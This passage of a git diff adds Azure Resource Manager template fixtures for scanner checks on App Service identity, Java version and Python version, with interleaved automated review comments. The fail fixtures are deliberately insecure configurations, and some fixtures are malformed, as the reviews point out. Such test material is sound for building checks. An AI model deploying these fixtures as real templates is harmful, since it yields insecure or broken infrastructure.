+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+ ],
+
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+ "siteConfig": {
+ "linuxFxVersion": "[parameters('linuxFxVersion')]",
+ "http20Enabled": "true",
+ "minTlsVersion": "1.2"
+ },
+ "clientCertEnabled": true
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/pass.json b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/pass.json
new file mode 100644
index 00000000000..523423b63a5
--- /dev/null
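Review bot: The fail case relies solely on the absence of an `identity` block on the `Microsoft.Web/sites` resource. A template can also disable managed identity explicitly with `"identity": { "type": "None" }`, and that shape would slip past a check that only tests for the key's presence; a second resource with that value would pin the behaviour (I cannot see the check implementation, so this is an inference from the fixture pair). The stray empty line inside `parameters.webAppName.metadata` is harmless JSON whitespace but looks accidental.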
+++ b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/pass.json
@@ -0,0 +1,76 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue" : "AzureLinuxApp",
+ "metadata": {
+ "description": "Base name of the resource such as web app name and app service plan "
+ },
+
+ "minLength": 2
+ },
+ "sku":{
+ "type": "string",
+ "defaultValue" : "S1",
+ "metadata": {
+ "description": "The SKU of App Service Plan "
+ }
+ },
+ "linuxFxVersion" : {
+ "type": "string",
+ "defaultValue" : "php|7.0",
+ "metadata": {
+ "description": "The Runtime stack of current web app"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ }
+ },
+ "variables": {
+ "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))] "
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2018-02-01",
+ "name": "[variables('appServicePlanName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('sku')]"
+ },
+ "kind": "linux",
+ "properties":{
+ "reserved":true
+ }
+ },
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2018-11-01",
+ "name": "pass",
+ "location": "[parameters('location')]",
+ "kind": "app",
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+ ],
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+ "siteConfig": {
+ "linuxFxVersion": "[parameters('linuxFxVersion')]",
+ "http20Enabled": "true",
+ "minTlsVersion": "1.2"
+ },
+ "clientCertEnabled": true
+ }
+ }
+ ]
+}
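Review bot: `"appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))] "` carries a trailing space inside the string, so the value no longer ends with `]` and ARM would treat it as a literal string instead of evaluating the expression; the `resourceId(..., variables('appServicePlanName'))` references in the same file would then point at a plan named with that literal text. It does not affect the identity check this fixture exists for, but fixtures should stay deployable templates: `"appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"`. The fail fixture in this same commit has the value without the space, so the two files currently diverge on this line only by accident.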
diff --git a/tests/arm/checks/resource/example_AppServiceJavaVersion/fail.json b/tests/arm/checks/resource/example_AppServiceJavaVersion/fail.json
new file mode 100644
index 00000000000..9c56d83f5d5
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceJavaVersion/fail.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "fail",
+ "properties": {
+ "publisherEmail": "[parameters('adminEmail')]",
+ "publisherName": "[parameters('organizationName')]",
+ "customProperties": "[parameters('customProperties')]"
+ },
+ "siteConfig": {
+ "javaVersion": "13"
+ },
+ "resources": [],
+ "dependsOn": []
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServiceJavaVersion/pass.json b/tests/arm/checks/resource/example_AppServiceJavaVersion/pass.json
new file mode 100644
index 00000000000..efc82c16d50
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceJavaVersion/pass.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "properties": {
+ "publisherEmail": "[parameters('adminEmail')]",
+ "publisherName": "[parameters('organizationName')]",
+ "customProperties": "[parameters('customProperties')]"
+ },
+ "siteConfig": {
+ "javaVersion": "17"
+ },
+ "resources": [],
+ "dependsOn": []
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePythonVersion/fail.json b/tests/arm/checks/resource/example_AppServicePythonVersion/fail.json
new file mode 100644
index 00000000000..4b3064a7f0b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePythonVersion/fail.json
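Review bot: In both `example_AppServiceJavaVersion` fixtures `siteConfig` is a sibling of `properties` rather than a child of it, and `properties` holds API Management fields (`publisherEmail`, `publisherName`, `customProperties`) that do not belong to `Microsoft.Web/sites`; the other App Service fixtures in this commit put `siteConfig` under `properties`. If the check reads `properties.siteConfig.javaVersion`, neither fixture sets it and `13` versus `17` is never actually compared; if it reads a top-level `siteConfig` to satisfy these files, it would miss real templates. Moving the block to `"properties": { "siteConfig": { "javaVersion": "13" } }` (and `"17"` in pass.json) and dropping the APIM keys makes the fixtures valid templates and the test meaningful. The missing trailing newline on both files is cosmetic but easy to fix while here.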
@@ -0,0 +1,381 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "fail", + "version": "0.25.53.49325", + "templateHash": "16144177164140676603" + } + }, + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "[format('webApp-{0}', uniqueString(resourceGroup().id))]", + "minLength": 2, + "metadata": { + "description": "Web app name." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "sku": { + "type": "string", + "defaultValue": "F1", + "metadata": { + "description": "The SKU of App Service Plan." + } + }, + "language": { + "type": "string", + "defaultValue": ".net", + "allowedValues": [ + ".net", + "php", + "node", + "html" + ], + "metadata": { + "description": "The language stack of the app." + } + }, + "helloWorld": { + "type": "bool", + "defaultValue": false, + "metadata": { + "description": "true = deploy a sample Hello World app." + } + }, + "repoUrl": { + "type": "string", + "defaultValue": "", + "metadata": { + "description": "Optional Git Repo URL" + } + } + }, + "variables": { + "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]", + "gitRepoReference": { + ".net": "https://github.com/Azure-Samples/app-service-web-dotnet-get-started", + "node": "https://github.com/Azure-Samples/nodejs-docs-hello-world", + "php": "https://github.com/Azure-Samples/php-docs-hello-world", + "html": "https://github.com/Azure-Samples/html-docs-hello-world" + }, + "gitRepoUrl": "[if(bool(parameters('helloWorld')), variables('gitRepoReference')[toLower(parameters('language'))], parameters('repoUrl'))]", + "configReference": { + ".net": { + "comments": ".Net app. No additional configuration needed." + }, + "html": { + "comments": "HTML app. No additional configuration needed." 
+ }, + "php": { + "phpVersion": "7.4" + }, + "node": { + "appSettings": [ + { + "name": "WEBSITE_NODE_DEFAULT_VERSION", + "value": "12.15.0" + } + ] + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", 
+ "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + 
"headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "3.4", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + 
"virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AppServicePythonVersion/pass.json b/tests/arm/checks/resource/example_AppServicePythonVersion/pass.json new file mode 100644 index 00000000000..15f4d5e5a36 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServicePythonVersion/pass.json 
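Review bot: The new fail.json is a 381-line type skeleton (`"bool"`, `"string"`, `"int"` placeholders) in which only `"pythonVersion": "3.4"` under `properties/siteConfig` is meaningful for the check, and the same skeleton is repeated in the following pass.json and unknown.json hunks with `"3.10"` and `"unknown"`. A trimmed fixture holding just the `Microsoft.Web/sites` resource with `properties.siteConfig.pythonVersion`, as the sibling AppServiceJavaVersion fixtures do, would make the intended difference between the three cases visible in a diff and keep placeholder values such as `"minTlsVersion": "string"` from being mistaken for real configuration. If the skeleton is kept, `_generator.name` is `"fail"` in fail.json and unknown.json but `"bicep"` in pass.json, which suggests hand-edited generator output; a root `metadata.description` such as `"Fixture for the AppServicePythonVersion fail case"` would record the intent more reliably than the generator stamp.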
@@ -0,0 +1,381 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.25.53.49325", + "templateHash": "16144177164140676603" + } + }, + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "[format('webApp-{0}', uniqueString(resourceGroup().id))]", + "minLength": 2, + "metadata": { + "description": "Web app name." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "sku": { + "type": "string", + "defaultValue": "F1", + "metadata": { + "description": "The SKU of App Service Plan." + } + }, + "language": { + "type": "string", + "defaultValue": ".net", + "allowedValues": [ + ".net", + "php", + "node", + "html" + ], + "metadata": { + "description": "The language stack of the app." + } + }, + "helloWorld": { + "type": "bool", + "defaultValue": false, + "metadata": { + "description": "true = deploy a sample Hello World app." + } + }, + "repoUrl": { + "type": "string", + "defaultValue": "", + "metadata": { + "description": "Optional Git Repo URL" + } + } + }, + "variables": { + "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]", + "gitRepoReference": { + ".net": "https://github.com/Azure-Samples/app-service-web-dotnet-get-started", + "node": "https://github.com/Azure-Samples/nodejs-docs-hello-world", + "php": "https://github.com/Azure-Samples/php-docs-hello-world", + "html": "https://github.com/Azure-Samples/html-docs-hello-world" + }, + "gitRepoUrl": "[if(bool(parameters('helloWorld')), variables('gitRepoReference')[toLower(parameters('language'))], parameters('repoUrl'))]", + "configReference": { + ".net": { + "comments": ".Net app. No additional configuration needed." + }, + "html": { + "comments": "HTML app. No additional configuration needed." 
+ }, + "php": { + "phpVersion": "7.4" + }, + "node": { + "appSettings": [ + { + "name": "WEBSITE_NODE_DEFAULT_VERSION", + "value": "12.15.0" + } + ] + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", 
+ "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + 
"headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "3.10", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + 
"virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AppServicePythonVersion/unknown.json b/tests/arm/checks/resource/example_AppServicePythonVersion/unknown.json new file mode 100644 index 00000000000..7e664c561be --- /dev/null +++ b/tests/arm/checks/resource/example_AppServicePythonVersion/unknown.json 
@@ -0,0 +1,381 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "fail", + "version": "0.25.53.49325", + "templateHash": "16144177164140676603" + } + }, + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "[format('webApp-{0}', uniqueString(resourceGroup().id))]", + "minLength": 2, + "metadata": { + "description": "Web app name." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "sku": { + "type": "string", + "defaultValue": "F1", + "metadata": { + "description": "The SKU of App Service Plan." + } + }, + "language": { + "type": "string", + "defaultValue": ".net", + "allowedValues": [ + ".net", + "php", + "node", + "html" + ], + "metadata": { + "description": "The language stack of the app." + } + }, + "helloWorld": { + "type": "bool", + "defaultValue": false, + "metadata": { + "description": "true = deploy a sample Hello World app." + } + }, + "repoUrl": { + "type": "string", + "defaultValue": "", + "metadata": { + "description": "Optional Git Repo URL" + } + } + }, + "variables": { + "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]", + "gitRepoReference": { + ".net": "https://github.com/Azure-Samples/app-service-web-dotnet-get-started", + "node": "https://github.com/Azure-Samples/nodejs-docs-hello-world", + "php": "https://github.com/Azure-Samples/php-docs-hello-world", + "html": "https://github.com/Azure-Samples/html-docs-hello-world" + }, + "gitRepoUrl": "[if(bool(parameters('helloWorld')), variables('gitRepoReference')[toLower(parameters('language'))], parameters('repoUrl'))]", + "configReference": { + ".net": { + "comments": ".Net app. No additional configuration needed." + }, + "html": { + "comments": "HTML app. No additional configuration needed." 
+ }, + "php": { + "phpVersion": "7.4" + }, + "node": { + "appSettings": [ + { + "name": "WEBSITE_NODE_DEFAULT_VERSION", + "value": "12.15.0" + } + ] + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "unknown", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": 
"string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", 
+ "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "unknown", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", 
